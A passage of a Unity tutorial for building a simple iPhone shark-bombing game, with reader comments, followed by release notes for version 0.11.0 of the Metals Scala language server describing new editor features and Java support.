Left”. - In the “Other settings” strip for Bundle Identifier put in whatever you want (except the default value) - In the “Other settings” strip set the Target device to “iPhone only”. One final touch: To the left under the “Game” tab now you have available different orientations/resolutions – select “iPhone Wide(480×320)” to match the default landscape orientation. Congrats – you now have a basic “Hello World” project that you can try out on your iPhone! Running the Game on Your iPhone To test everything we did up to now, we’re going to finish by testing the project in Xcode and your iPhone. Startup your favorite Xcode version – close the welcome screen if there’s one and switch back to Unity. This is a trick how to tell Unity which Xcode version to use – just have it running aside. Back in Unity, from the menu choose “File\Build&Run”- this will popup again the Build Settings, click “Build and Run” button. You will be asked where do you want to save your Xcode project (they don’t really say that, but this is what they are asking). Inside your project directory create a folder called “SharkBomberXcode” (this is where your Xcode stuff will reside) and as file name put in “SharkBomber”. After few moments the project is built and you will have Xcode window popup with a project opened called Unity-iPhone. What happened is that Unity has generated the source code of an Xcode project and you have now this generated project ready to build&run from Xcode. You might wanna have a look at the source code – but it’s actually a boilerplate which loads the mono framework included as few chunky dll files and some assets, so there’s not much you can play with. You have 2 targets, so make sure your iOS device is plugged in and select the “Unity-iPhone” target and your device. (I can’t make the Simulator target run, if you do great, but for now I’ll stick to the device). Moment of truth – hit the Run button, and your Unity project now runs on your iPhone! Good job, you can see the default Unity start screen and then just the blue background of your scene (and the words “trial version” in a corner). Stop the Run task, switch back to Unity, and save your project. Setting up the Scene First let’s setup the main camera on the scene. Select “Main Camera” in “Hierarchy”, in the Inspector find “Projection” and set it to “Orthographic”, “Size” set to “10”, in Clipping Planes set “Near” to “0.5” and Far to “22”. Now you see a box nearby your camera inside the scene- this is the bounds of what will be seen on the screen from your world. Notice we’ve set the camera projection to “Orthographic”- this means the depth coordinate won’t affect how things look on the screen – we’ll be effectively creating a 2D game. For the moment let’s work like that until you get used to Unity, then we’ll switch to 3D projection. Set your camera position (in the Inspector) X, Y and Z to [0,0,0]. Note from now on when I write position to [x,y,z], just set the 3 values in the 3 boxes for that property. Right-click in the Project panel and again choose “Create/Folder”, call the new folder “Textures”. Then download this background image I’ve put together for the game and save it somewhere on your disc. Drag the background image from Finder and drop it onto the “Textures” folder you just created. It takes good 20 seconds on my iMac to finish the import, but when it’s done do open the folder, select the “background” texture, and in the inspector look at the texture’s properties. At the very bottom in the preview panel it says “RGB Compressed PVRTC 4bits.” Hmmm, so Unity figured out we’re importing a texture and compressed it on the go – sweet! From the menu choose “GameObject\Create other\Plane” and you will see a blue rectangle next to the camera. This is the plane we just added to the scene; we’re going to apply the texture we’ve got to it. Select “Plane” in the Hieararchy panel, in the Inspector in the text field at the top where it says “Plane” enter “Background”. This changes the object’s name, this is how you rename an object. Drag the “background” texture from the Project panel and drop it onto the “Background” object in Hierarchy. Set the position of the plane in the Inspector to [4, 0, 20], the Rotation to [90, 180, 0] and Scale to [10, 1, 5] – this as you see in the “Scene” panel scales and rotates the plane so that it faces the camera – this way the camera will see the plane as the game’s background. Now in order to see clearly what we have on the scene we’ll need some light (much as in real life) – choose “GameObject\Create other\Directional Light” – this will put some light on your scene. Select Directional Light in “Hierarchy” and set the following Position coordinates [0, 0, 0]. Now we have all the setup and the background of the scene, it’s time to add some objects and make them move around! Adding 3D Objects to the Scene From the menu choose “GameObject\Create other\Cube” – this adds a cube object to your scene. This will be the game player, so rename it to “Player”. Set the following position: [-15, 5.3, 8]. You’ll see the cube appearing near the left side of the screen in the “Game” panel – this is where our plane will start and will move over the sea surface to the other end of the screen. Now let’s import the plane model! We’ll be using free 3D models produced by Reiner “Tiles” Prokein and released for free on his website (also have a look at his license for the models). To start, download his airplane model and unarchive the contents. Right-click inside the “Project” panel and choose “Create/Folder”, rename the folder to “Models”. From the the folder where you unarchived the plane model drag the file “airplane_linnen_mesh.obj” and drop it onto the “Models” folder in the “Project” panel. Then right-click the “Models” folder and choose “Create/Folder”, rename the new subfolder to “Textures” – here we’ll save the textures applied to models. Drag the file “airplane_linnen_tex.bmp” and drop it onto the newly created “Textures” folder. Next, select the “Player” object in the “Hierarchy” panel, look in the “Inspector” – the “Mesh Filter” strip is the filter which sets your object’s geometry (right now it sets a cube geometry); on the row saying “Mesh – Cube” find the little circle with a dot in the middle and click it – this opens a popup where you should double click the plane model and this will change your object’s geometry to an airplane. Now one fine detail – the airplane looks a bit messed up. I’m no 3D expert, but I found what fixes this in Unity: select “airplane_linen_mesh” in “Project” panel then in the “Inspector” find “Normals” and select “Calculate”, then scroll down and click “Apply” button. Cool – now you see the smooth airplane in the scene! Let’s apply also its texture: Drag “airplane_linnen_tex” texture from your “Project” panel and drop it onto “Player” in the “Hierarchy” panel. Unity automatically applies the texture to the airplane model we have on the scene. Final touches for the airplane: to the “Player” object set Rotation to [0, 90, 350] and Scale to [0.7, 0.7, 0.7], this will rotate and scale the plane so it looks like flying just over the sea surface. This game might not be Call of Duty quite yet, but stay tuned, because in the next section we’re going to make our airplane fly! :D Beginning Unity3D programming with C# As you’ve already seen in the Build Settings dialogue Unity can build your project to a Wii game, an iPhone game, standalone Mac game, and so forth. Because Unity is so omnipotent it needs some kind of intermediate layer where you can program your game once; and each different build translates it to platform specific code. So oddly enough, to program in Unity you will be using C# (not Objective-C!), and when Unity generates your Xcode project it will translate that C# code to platform specific code automatically! Right-click inside the “Project” panel and choose “Create/Folder”, rename the new folder to “Class”. Right-click the “Class” folder and choose “Create/C Sharp Script”, rename the new file to “PlayerClass”. Right-click inside the “Project” panel and choose “Sync MonoDevelop Project”- this opens the MonoDevelop IDE – this is the IDE where you can program in C#. Note: MonoDevelop is a program ported from Linux, as you can see by the user interface skin called Gnome, so it’s normal if it crashes every now and then, especially when you try to resize the window. If that happens, just start it again by clicking “Sync MonoDevelop Project”. Here are the three major areas in the MonoDevelop GUI: - Your MonoDevelop project browser – in Assets/Class you will find your PlayerClass.cs file. - The currently open class outline - Editor area – there’s some syntax highlighting and some auto-complete which will help you coding. Find your PlayerClass.cs file in the project browser and double click it to open it in the editor. Make sure that the class looks like the following: The clause “using” includes the given libraries and frameworks, UnityEngine is the library which gives you access to things like iPhone’s accelerometer, keyboard input and other handy stuff. You define your new class and inherit from MonoBehaviour – this gives you lots of stuff for free: you can override a long list of methods which are called when given events are triggered. Just few lines below you have empty Start and Update methods – these are 2 important events. - Start is called when your object appears on the scene so you can make your initialization (much like viewDidAppear: in UIController). - Update is called when every frame is rendered (i.e. could be 30, 60 or 100 times a second, you never know how often) and here’s where you do your movements, game logic, etc. Now let’s switch back to Unity for a moment. We’ll want to make the airplane fly over the sea and when it goes out of the right side of the screen to appear again from the left side. Let’s measure at what position we need to move the airplane to the left. In the “Scene” panel at the top right corner you see the orientation gizmo – click on the X handle (it’s a kind of red cone, I’ll call it handle): This will rotate the scene and orient it horizontally towards you. Click again the handle which is now on the left side of the gizmo – this will rotate the scene around, you might need to click the left handle few times until you see the scene frontal like this: Now you can use the mouse scroll wheel to zoom in/zoom out on the scene and fit it inside the “Scene” panel. Make sure the move tool is selected in the toolbar above and select the “Player” in the “Hierarchy”. Now you see that a new gizmo appeared attached to the airplane with a green and red arrows. Now, you can drag the arrows and they will move the airplane in the axis the arrows represent: What you need to do is grab the red arrow (horizontal axis) and drag the airplane to the right until it goes out of the “Game” panel below. So start dragging inside the “Scene” panel, but while looking at the “Game” panel. Leave the airplane just outside the visible screen and have a look at its position in the “Inspector”. X should be now around “17.25” – so this is the right bound of the screen, you can drag the plane left and you’ll see the left bound is about “-17.25″, so we’ll use “18” and “-18″ to wrap the airplane flight. Bring back the airplane to just about the left side of the screen where it was before. Switch back to MonoDevelop, and make the following changes to PlayerClass.cs: As you already guessed, you just declared a public property on your class called “speed”, but what is unique to Unity is that all public class properties are also accessible via… the “Inspector” panel (ta-daaaah)! So you can set the values of your class properties from the IDE and you can monitor the values of your properties while the game runs in real time – for free – how cool is that?! The “transform” variable is a property on every game object (and everything inside a scene is a game object) which handles the object’s position in space: rotation, position, scale, etc. So on every Update call to translate the object’s position so that it moves to the right of the screen. We can’t just move the plane a set amount per call to Update, because nobody knows how many times this will actually be called per second. Instead, we define the speed to be units per second, and divide the speed by the amount of time elapsed since the last call to Update (Time.deltaTime). This way the object moves always with the same speed independently from the current frame rate. The call to Translate takes 3 values – the translation it has to do on each axis. You probably notice that we are moving the airplane on the Z axis (3rd parameter) – we have to do that because we rotated the plane on the scene, so translating the Z axis moves it to the right from the perspective of the player! Look at the “if” statement – we check if transform.position.x is bigger than 18 (remember why?) and if so, we set the airplane’s position to same coordinates but “-18″ on the X axis. We use new Vector3(x,y,z) to set the position – we’ll be using a lot of these vectors for all positioning; you notice also we set a random speed between 8 and 12 – this is just to make the plane move more randomly to keep things interesting. At this point we are ready to see the airplane move! Switch back to Unity. Drag the “PlayerClass” from “Project” panel onto “Player” in the “Hierarchy” panel – this way you attach the class to a game object. Select “Player” in “Hierarchy” and look in the “Inspector”- you’ll see a new strip appeared called “Player Class (Script)” where you also see your public property! yay! Set a value of “12” for it. OK. Ready? Hit that Play button! Woot! You can see in both “Scene” and “Game” panels that the airplane flies around and when goes out of the right comes back from the left side. Also notice in the “Inspector” the X value of position is alive as well – it shows you where the plane is at any given moment. Also Speed changes to random values every time the plane flight wraps. Once you’re done enjoying this coolness, don’t forget to hit Play again to stop the game. Next up, time to give this plane a formidable foe – a menacing shark! Now that you’re familiar with the basics, things will go faster since we won’t be doing anything new for a while. Need a break? We’ve covered a lot here! So if you get tired or just need to have a break, no problem – just save your Unity project and you can open it later. But! When you open a Unity project it opens by default an empty scene. To load the scene you are working on – double click “LevelScene” in the “Project” panel – now you can continue working. Jumping the Shark Go ahead and download and unarchive the Shark model. As you did before with the airplane, drag the file “shark.obj” onto the “Project” panel inside the “Models” folder and “sharktexture.bmp” inside “Models/Textures”. From the menu choose “GameObject/Create other/Capsule” – rename the “Capsule” object in “Hierarchy” to “Shark”. In “Inspector” inside the “Mesh Filter” strip click the circle with dot inside and in the popup window double click the Shark model. Now you should see the Shark geometry in the “Scene” and “Game” panels. Drag “sharktexture” from “Project” panel (it’s inside Models/Textures) onto the “Shark” object in “Hierarchy” – this gives your shark a vigorous mouth and some evil eyes! Pfew – I already want to bomb it! Make sure “Shark” is selected and set the following properties in the “Inspector”: Position – [20, -3, 8], Scale – [1.2, 1.2, 1.2] – this will put the shark just right off the camera visible box – it’ll start moving from there towards the left side of the screen. Now since we’d want the shark to interact with our bombs (by exploding, mwhahahahah!) we want the Collider of the shark to match more or less the shark’s geometry. As you see there’s a green capsule attached to the shark inside the scene. This is the shark’s collider. Let’s have it matching this evil predator’s body. In the “Inspector” find the “Capsule Collider” strip and set the following values: Radius to “1”, Height to “5”, Direction “X-Axis”, Center to [0, 0, 0]. Now you see the capsule collider has rotated and matches more or less the shark’s body – better! Last – select “shark” model in “Project” panel “Models” folder then in the “Inspector” find “Normals” and select “Calculate”, then scroll down and click “Apply” button. Right-click inside the “Project” panel in “Class” folder and choose “Create/C Sharp Script”, rename the new script to FishClass. Righ-click and choose “Sync MonoDevelop Project”. MonoDevelop will pop up. Open the FishClass.cs file and put inside the following code: It’s pretty similar to what we have already for the airplane. We have a speed property (per second) and in the Update event handler we use transform.Translate to move the shark. Notice this time I used: This is just to demo that some of these methods can take different parameters – however passing separately 3 values or 1 vector is pretty much the same. Now let’s see what the shark does when it reaches the bounds of the screen (-30 and 30 in this case, so there’s is a moment when the shark is offscreen, so you can’t easily ambush it when entering back). When the shark reaches left or right bound it turns around moves a bit towards the bound and changes speed. This way it just goes back and forth, back and forth continuously. The call to transform.Rotate(new Vector3(x,y,z)) obviously rotates the object around the axis by the given values, and transform.Translate(new Vector3(x,y,z)) you already know well. Pretty easy! Switch back to Unity and drag the “FishClass” script onto the “Shark” object in “Hierarchy”. Now hit Play: you can see the huge shark going back and forth waiting to be bombed. Good job! Adding the Clown Fish Let’s do the same procedure again for our ClownFish. I’ll put it into a nice list for quick reference: - Download and unarchive the ClownFish model. - Drag “mesh_clownfish.obj” into “Project” panel inside “Models” folder and “clownfish.bmp” inside “Models/Textures”. - Choose “GameObject/Create other/Capsule” and rename the “Capsule” object in “Hierarchy” to “ClownFish”. - Click “Mesh Filter” circle-with-a-dot-button and from the popup double click the clownfish geometry. - Drag the “clownfish” model texture onto “ClownFish” object in “Hierarchy”. - While having “ClownFish” selected change the following properties in the “Inspector”: - Position to [-20, -1, 7] - Rotation to [0, 180, 0] - Scale to [0.4, 0.3, 0.3] - Radius to “4” - Height to “4” - Direction to “Z-axis” - Center to [0, 0, 0]. Hit Play and see what happens – now you have two moving fish without having to write any extra code! Everything works perfect – the fish go back and forth, plane is wrapping. We need some boooombs! Set Us Up The Bomb Download and unarchive the Can model. As usual, drag the “colourcan.obj” file in “Project” panel “Models” folder and “cantex.bmp” file in “Models/Textures”. From the menu “GameObject/Create Other/Capsule”, rename the object to “Bomb”. From the Mesh Filter popup double click the can geometry. Drag the “cantex” texture onto the “Bomb” object in “Hierarchy”. In “Inspector” “Capsule collider” click this button to open the popup menu: When the popup menu appears, choose “Reset” – this way the collider automatically will take the size of the geometry assigned – cool! Next select the “colourcan” model in “Project” panel “Models” folder then in the “Inspector” find “Normals” and select “Calculate”, then scroll down and click “Apply” button. Now let’s dive into new stuff! Select the bomb object again, and inside the Capsule Collider strip check the “Is Trigger” checkbox – aha! Check this to make the bomb object will trigger event when it collides with other objects. But for this to happen we need to also assign a Rigid Body to the bomb (as at least one of the colliding objects needs to have a rigid body). From the menu choose “Component/Physics/Rigidbody” (Bomb should be selected in the Hierarchy!). Once you do this, a new strip should appear in the “Inspector” called “Rigidbody”. Uncheck “Use gravity” (we won’t use gravity) and check “Is Kinematic” to be able to control the body programatically. This was all we needed to have collisions enabled! Download and save on your disc this bomb releasing sound (which I made myself, lol!) We would like to play this sound when the airplane releases a bomb, i.e. when the bomb first appears on the screen. Let’s do that! Right-click in the “Project” panel and choose “Create/Folder”, rename the new folder to “Audio”. Drag the “bahh1.aif” file onto the “Audio” folder. Next drag the “bahh1″ sound file from “Project” panel onto the “Bomb” object in “Hierarchy”. Believe it or not, that’s all we need to do – the sound is attached to the bomb and will play when the bomb appears on screen. Notice how easy some things are with Unity? Select the “Bomb” object in “Hierarchy” and in “Inspector” find the “Audio Source” strip: see that “Play On Awake” checkbox is checked – this tells the audio to play when the object appears on the scene. Also look at the “Scene” panel – see the bomb has now a speaker attached? Prefabricating your Game Objects Remember that “Hierarchy” shows what’s on the scene currently, and “Project” holds all your object for you? This has to do something with our goal here – have many bombs loaded on the plane and release them at will into the sea. What we are going to do is – we are going to prefabricate a game object (it will be ready and set to appear on the scene), but we won’t add it to the scene- we are going to instantiate (or clone if you are a sci-fi fan) this “prefab” into a real living game object on the scene. Right-click inside the “Project” panel and choose “Create/Folder”, rename it to “Prefabs”. Right-click “Prefabs” and choose “Create/Prefab”. Rename the new prefab to “BombPrefab”. Notice the little cube icon is white – this indicates an empty prefab. Now – drag the “Bomb” from Hierarchy onto the “BombPrefab” in “Project”. Notice the cube icon is now blue – means a full prefab, ready to be cloned. Also important – look at the “Hierarchy” panel now – “Bomb” font changed to blue color – that means this object now is an instance of a prefab. Now that we have our bomb cookie cutter set, we don’t need the original bomb object on the scene – right-click on “Bomb” in “Hierarchy” and choose “Delete”. Let’s get coding! Switch to MonoDevelop and open up the PlayerClass.cs. under the “speed” property declaration add: Have you guessed already? In this property we’ll hold a reference to the BombPrefab and we’ll make instances as we wish. Notice the property type is “GameObject”, as I said earlier everything in the game is a GameObject (much like NSObject in Cocoa), so it’s safe to set that type for just about anything. Now switch back to Unity and select the “Player”. As you expected in the “Inspector” under “Script” there’s a new property “BombPrefab”. Let’s set its value: drag the “BombPrefab” from “Project” panel onto the “Inspector” where it says “None(GameObject)” and drop – now the field indicates it has BombPrefab prefab attached as value. Cool! We’re going to need a C# class also for the bomb – right-click inside “Project” in “Class” folder and choose “Create/C Sharp Script”, rename it to “BombClass”. Right-click and “Sync MonoDevelop Project” – MonoDevelop pops up. Open up BombClass.cs and replace the contents with this code: This is pretty similar to everything we’ve done up to now – we translate the object every frame and when out of the screen bounds we react appropriately. In the bomb case we just want to destroy the object since we can always make new ones from our bomb prefab. In the code note that “this” refers to the C# bomb class, while the gameObject property refers to the object on the scene – so we destroy the object on the scene and all components attached to it. We’ll have a look at the game object hierarchy in Part 2 when you access components attached to an object programatically. Bombing that shark! Finally the part you’ve been waiting for – gratuitous violence! :] Open up PlayerClass.cs. At the end of the Update method add: Let’s go over this line by line. - Input is the class giving you access to keyboard, mouse, accelerometer and touches. Input.anyKeyDown is true when a key is pressed, this happens only once – i.e. when the button was first pressed; then Input.anyKeyDown is false again until another key is pressed. anyKeyDown is actually a handy abstraction – it actually is true when a mouse button was clicked, keyboard key was pressed or (!) a tap on the iPhone’s screen was received. - (GameObject)Instantiate(bombPrefab) is the magic line that creates an instance from a prefab and adds it to the scene. - Finally we set the position of the bomb to be same as the airplane’s. Cool – we have our bomb created when the player taps the screen, it then starts to fall down and when out of the screen destroys itself. Let’s give it a try! Switch back to Unity and hit Play – now if you click inside the “Game” panel (simulating a tap) you will see a bomb is created where the plane is at that point. Click many times – many bombs are created. You should also hear the bomb sounds. But the bombs don’t fall down! Why? Can you figure out what’s the problem by yourselves already? Answer after the break. I hope you figured it out, but here’s what’s the problem: you haven’t yet assigned the BombClass script to the Bomb Prefab – that’s why the bombs don’t fall down. Drag “BombClass” from your “Project” panel “Class” folder onto “BombPrefab” in “Prefabs” folder in the same panel. Check in the “Inspector” if you see the Bomb Class Script strip. Now hit Play again. That’s better! Still not perfect though – those sharks don’t die when you hit them. Since we already configured the colliders and the rigidbody component of the bomb, we just need to add the code to react to collision. Switch back to MonoDevelop and add this new method to the BombClass: Let’s go over the code line by line again: - OnTriggerEnter is a method called when the body attached collides with another body, and the 2nd body is passed as a parameter. - Here we check if the object the bomb hits is called “Shark”. - If the shark is hit, then 1st reset the object rotation. - 2nd, we reset the shark back to its original position. - Finally, we call destroy this.gameObject to make the bomb disappear from the scene. Pretty easy again! Isn’t it? That’s about all you need – switch back to Unity, and run your game! Hit sharks disappear and new ones come in. You can also choose from the menu “File/Build&Run” and when Xcode pops up hit “Run” in Xcode – now you have the game on your iPhone – sweet! Where To Go From Here? Here is a sample project with all of the code from the above tutorial. I hope you amused yourselves and learned a ton of new things – in Part 2 of the series we’re going to spice up things a notch and make this game really challenging and fun! In the meantime, if you have any questions about this tutorial or Unity in general, please join the forum discussion below! 15 Comments Awesome Tutor thank you I would have preferred 2.5D for Cocos2D but you can't please everyone. Someone always has to complain LOL Thanks. Sample project is not complete, right? I failed to see the background in the Game view. Do I need to change Render Settings for this game? Thanks! But one question : can we insert 3d animated models like a shark with a moving tail when he's swimming for more realistic gameplay. Thx again for all your great tutorials. P.S : There is a nice application we can found on the AppStore for simulating our games from Unity, it's called : Unity remote, so if you don't have a developing profile for testing the game on your iphone you can use this app, it's very easy to use. Inserting animations within Unity is, from the little knowledge I have of the engine, quite simple. Check out where they have dozens of hours of free tutorials on Unity, they are very short and easy to pick up I saw on your wife's blog that you are going to do a tutorial on how to make a catapult game that uses box2d physics similar to angry birds. I'm working on a game with similar functionality and just having a time. I've got lots of programming experience but am totally new to cocos2d and box2d and iphone/ipad development in general. I could really use that tutorial. Do you have any idea when the tutorial will be ready? Any available code at this time? Specifically I'm interested in the parallax scrolling of the background, attaching the catapult to the world and how to move it with the revolute joint. Any help you can give me would be greatly appreciated. Thanks, Bob Hunt Thanks Ray, I'm really looking forward to the tutorial. I love your book also. It's really helped me a lot. Take care, Bob Hunt Is it possible to work on the Project in Unity from a Windows PC, then copy the project files over to a Mac and then build it for the iPhone? My MBP is quite old and very slow, I just had it crash on me when running Unity so I would rather try it on my workstation. But the deploying to my iPhone went fine. So I hope I can just copy the whole project accross (or place it on a NAS from the beginning). I do have a problem: after the first collision happens (the bomb is destroyed and the shark is reset), subsequent bombs do not collide with the shark. Why is that? The nifty thing about the repo is that you can build both Android apks and iPhone ipas using command line tools. It's a nice start to automating the build. To do so (assuming a mac with xcode): 1) git clone 2) cd unity-shark-bomber 3) source scripts/envsetup.sh 4) hmm # this will give you help 5) sb-build-android # builds android apk (you may need to tweak the script a bit for your env) 6) sb-build-ios # builds ipa (you'll need to provide some env vars first. Run the script and it'll tell you what you need) enjoy! The tutorial works just fine for me.
http://www.raywenderlich.com/4551/how-to-make-a-2-5d-game-with-unity-tutorial-part-1
CC-MAIN-2014-52
refinedweb
6,614
70.73
Problem: In a Java program, you need a way to extract multiple groups (regular expressions) from a given String. Solution: Use the Java Pattern and Matcher classes, and define the regular expressions (regex) you need when creating your Pattern class. Also, put your regex definitions inside grouping parentheses so you can extract the actual text that matches your regex patterns from the String. Example: How to extract multiple regex patterns from a String In the following source code example I demonstrate how to extract two groups from a given String: import java.util.regex.Matcher; import java.util.regex.Pattern; /** * Demonstrates how to extract multiple "groups" from a given string * using regular expressions and the Pattern and Matcher classes. * * Note: "\\S" means "A non-whitespace character". * @see */ public class PatternMatcherGroupMultiple { public static void main(String[] args) { String stringToSearch = "Four score and seven years ago our fathers ..."; // specify that we want to search for two groups in the string Pattern p = Pattern.compile(" (\\S+or\\S+) .* (\\S+the\\S+).*"); Matcher m = p.matcher(stringToSearch); // if our pattern matches the string, we can try to extract our groups if (m.find()) { // get the two groups we were looking for String group1 = m.group(1); String group2 = m.group(2); // print the groups, with a wee bit of formatting System.out.format("'%s', '%s'\n", group1, group2); } } } With these two regular expressions, the output from this program is: 'score', 'fathers' Discussion The first regex ( (\\S+or\\S+)) matches the word "score", and the second regex ( (\\S+the\\S+).*")) matches the word "fathers". These two groups are extracted from the input String with these lines of code: String group1 = m.group(1); String group2 = m.group(2); and are then printed with System.out.format. It’s also important to note that the find method will only succeed if both of these patterns are found in the String. If only one regex pattern is found, find will return false. You can test this on your own system by changing one of the regex patterns to intentionally cause it to fail.
https://alvinalexander.com/blog/post/java/how-extract-multiple-groups-patterns-string-regex/
CC-MAIN-2021-17
refinedweb
346
65.62
Short version: We've changed the benchmark used in backtesting. When you re-run an algorithm through the backtester, you should expect different results for the benchmark and risk calculations. Long version: A few months ago it was pointed out in this thread that we were using a price-based benchmark rather than a returns-based benchmark. When we thought about it, it was pretty clear we'd chosen the wrong one. If you're comparing your algorithm to a benchmark, you need to look at the returns of that benchmark. This evening we changed the benchmark being used in the backtester. The effect of this is that most backtest results will look a little different than they did before. The benchmark will look better, which means the algorithm results won't look comparatively as good, and the risk metrics driven by the benchmark will similarly be different. For short backtests, or backtests that didn't include a dividend date, there won't be a change. For an 11-year test, the difference is pretty significant. We know that having a stable backtester is important, and having an accurate backtester is also important. This is one of those times where the goals are in conflict, and being correct is more important than being consistent. We work very hard to make changes like this as unusual as possible. We're sorry for any inconvenience this change causes. Example: The backtest below buys a bunch of SPY and holds it. You see the returns match pretty closely. The tiny differences in the returns are driven by the real-world effects of a strategy v. a benchmark. - The benchmark is assumed to be 100% invested at the market open, while the algorithm has to place an order in the first bar and be filled in the second bar. - The algorithm can't be 100% invested because it can't hold partial shares. It always has a small cash position, and that cash has 0% return. Still to Come: One of our highly-requested features is to make the benchmark customizeable. This change we shipped today gets us a long way towards that - when we put in the new benchmark, we laid the foundation for future changes on the fly. I don't have a delivery target yet but I'm hoping we can finish it sooner than later. Edit 31-Jan-14: Shipped another version of the benchmark - benchmark now even closer to the fully-invested SPY return. def initialize(context): context.spy = sid(8554) def handle_data(context, data): # put all my money in SPY. rebalance as dividends come in. order_target_percent(context.spy,1.0) if context.portfolio.cash < 10000: record(cash=context.portfolio.cash)
https://www.quantopian.com/posts/backtester-change-updated-benchmark
CC-MAIN-2019-18
refinedweb
452
65.32
We're happy to announce the release of Metals v0.11.0! Due to the number of changes in this release we decided to introduce one more minor version before Metals 1.0.0, which is planned to come this year. - Add CFR class file viewer. - [Scala 3] Type annotations on code selection. - Simplify usage of sbt server. - Better support for mill BSP. - Extract value code action. - Add command to run current file. - Support test explorer API. - Add go to definition via links for synthetic decorations. - Basic Java support. - Add support for Scala 2.13.8. - Reworked Metals Doctor. Add CFR class file viewer In addition to the recently added semanticdb, tasty and javap functionalities, thanks to the efforts of Arthurm1, it's now possible to decompile class files using Lee Benfield's CFR (Class File Reader). CFR decompiles class files to java, which is much more readable than using javap. In the future this might help in go to definition for jars that do not have a corresponding source jar, which is what Metals uses today. Editor support: VS Code, nvim-metals, Sublime Text Extension authors: This can be added as a new command for the users to invoke. [Scala 3] Type annotations on code selection In one of the last releases v0.10.8 we added the ability to inspect the type of an expression that is currently selected. We are happy to announce that this functionality is now also available for Scala 3, which is thanks to the continued effort of the team to bring the users the best Scala 3 experience possible. Editor support: VS Code, nvim-metals, Sublime Text Simplify usage of sbt server Previously if you wanted to use sbt as your build server instead of the default Bloop you'd need to ensure a .bsp/sbt.json file existed before you tried to switch your build server. We originally created the metals.generate-bsp command for this, but realized this potentially forced extra steps on the user. To make this simpler, now even if no BSP entry exists for sbt and you attempt to switch your build server to sbt via the metals.bsp-switch command, we'll either use the existing .bsp/sbt.json file if one exists or automatically generate it (needs at least sbt 1.4.1) for you and then switch to it. Editor support: All. Better support for mill BSP Recently Mill has complete revamped their BSP implementation allowing for a much better experience for Metals users. Just like sbt, you can now use the metals.bsp-switch command to use Mill as your BSP server (needs at least Mill 0.10.0-M4). Keep in mind that the BSP support in Mill is still a work-in-progress. If you are interested in Mill BSP and you're a Metals user, feel free to include your input here as they are requesting feedback on improving the experience. Editor support: All. Extract value code action In this release we introduce a new code action that allows users to automatically extract method parameter to a separate value. For example in a invocation such as: @main def main(name: String) = println("Hello " + name + "!") when user invokes the new code action they will see: @main def main(name: String) = val newValue = "Hello " + name + "!" println(newValue) This should work correctly for both Scala 2 and Scala 3, in which case it will try to maintain your coding style even if a block is needed. One important limitation is that this new code action doesn't allow extracting lambdas or partial functions, as this has the potential of breaking your code. Currently, this works only in method parameters and Metals will try to choose the exact parameter to extract even if there is a number of nested ones. This will most likely be improved in the future to also be used in other places such as if conditions or to allow users to choose the exact parameter they want to extract. Editor support: All Add command to run current file Based on the work of ckipp01 in one of the previous releases it's now possible to invoke a command to run anything in the current file. This means that if we use this new command anything that is located within the currently focused file, whether it's tests or a main class, will be properly discovered and run. In Visual Studio Code this replaces the previously default config generation and now if no launch.json is specified in the workspace, any file can be run using the default run command ( F5). Editor support: Any editor that supports DAP Support test explorer API. Metals 0.11.0 implements Visual Studio Code's Testing API. According to the documentation: The Testing API allows Visual Studio Code extensions to discover tests in the workspace and publish results. Users can execute tests in the Test Explorer view and from decorations. With these new APIs, Visual Studio Code supports richer displays of outputs and diffs than was previously possible. Test Explorer UI is a new default way to run/debug test suites and replaces Code Lenses. The new UI adds a testing view, which shows all test suites declared in project's modules. From this panel it's also possible to run/debug test or to navigate to test's definition. Code Lenses are still the default in other editors and can be brought back by setting "metals.testUserInterface": "Code Lenses" Editor support: Visual Studio Code Go to definition via links for synthetic decorations. Since Metals v0.9.6 it's possible to show additional information about sythetic code that is being generated by the compiler. This includes implicit parameters, classes and conversions. It wasn't however possible to find their definitions. This limitation was mostly due to the lack of proper UI options in different editors. Recently, we've managed to work around it by using command links that can be rendered in the hover and will bring the user to the right definition. Editor support: Visual Studio Code, Sublime Text Basic Java support Thanks to the the effort led by Arthurm1 Metals now supports a subset of features for Java files and even Java only build targets. Currently the biggest missing piece is interactive compiler that would allow us to properly support features such as completions, hover or signature help. This was possible thanks to using the Java semanticdb plugin included in lsif Java project from sourcegraph and especially the work by olafurpg. The support includes: - formatting - code folding - go to definition - references - go to implementation - rename - run/debug code lense for Java main classes These functionalities will also now work thanks to dos65's work in dependency sources. We are still missing some of the interactive features such as: - hover - completions - signature help - selection range An important note to make is that, while we still want to support some more features, Metals is not a Java language server, so we will never offer the same amount of functionality as the tools and IDEs focused on the Java language. Current discussion about the scope of Java support can be found in this issue. Especially, we will most likely not support any more advanced refactorings or presentation compiler functions. Visual Studio Code: In case you want to use Metals in a Java only workspace it's now also possible to start Metals using a new Start Metals button in the the Metals tab. We don't want to start Metals as a default in such cases as some other language server might be more suitable. Editor support: All Reworked Metals Doctor Due to the other changes in this release the Metals Doctor needed to be reworked to better show the different targets that are available in the workspace as well as try to explain a bit better what is supported and why it might not work. The type column can now have 3 different values Scala <version>, sbt <version> or Java. We also replaced some of the columnsm which are now: - diagnostics - tells whether and what kind of diagnostics are published by the target. - interactive - tells whether interactive features such as hover or completions are working, this should work for all supported Scala and sbt versions. - semanticdb - explains whther the semanticdb indexes are generated for the target - debugging - tells whether you can run or debug within that target - Java support - in mixed targets this will tell users if the semanticdb indexes are also generated for Java files. You can always look for explanation of these statuses underneath the table or on the right in the Recommendation column. Editor support: All Extension authors: If you are using the json output method for the doctor, you will need to modify the way it's displayed according to this. Miscellaneous - Allow to create trace files for debugging in .metalsdirectory. kpodsiad - Fix issues with stale code lens being shown. dos65 - Print Bloop logs when connection errored out. tgodzik - Fix issues with given imports in organize imports. tgodzik - Fix issues with type on selection in Ammonite scipts. tgodzik - [Scala 3] Improve type shown for generics in hover. dos65 - [Scala 3] Fix go to defition for givens. dos65 - Use Mill --importto import bloop when supported. lolgab - Enable to create file with just package. kpodsiad - Fix Gradle detection when file other than build.gradleis at top level. GavinRay97 - Use proper dialect and ignore sbt targets when automatically setting up scalafmt.conf. dos65 - Detect missing src.zip in doctor. ayoub-benali - Ensure autoimports don't break scala-cli directives. ckipp01 - [Scala 3] Don't show error type if it cannot be inferred by the compiler. tgodzik - Fix analyze stacktrace when using toplevel methods. tgodzik - [Scala 3] Fix insert type in case of type aliases. tgodzik - [Scala 3] Use maybeOwner instead of owner when looking for shortened name. ckipp01 - [Scala 3] Fix autoimport with prefixes. dos65 Contributors Big thanks to everybody who contributed to this release or reported an issue! $ git shortlog -sn --no-merges v0.10.9..v0.11.0 Tomasz Godzik Ayoub Benali 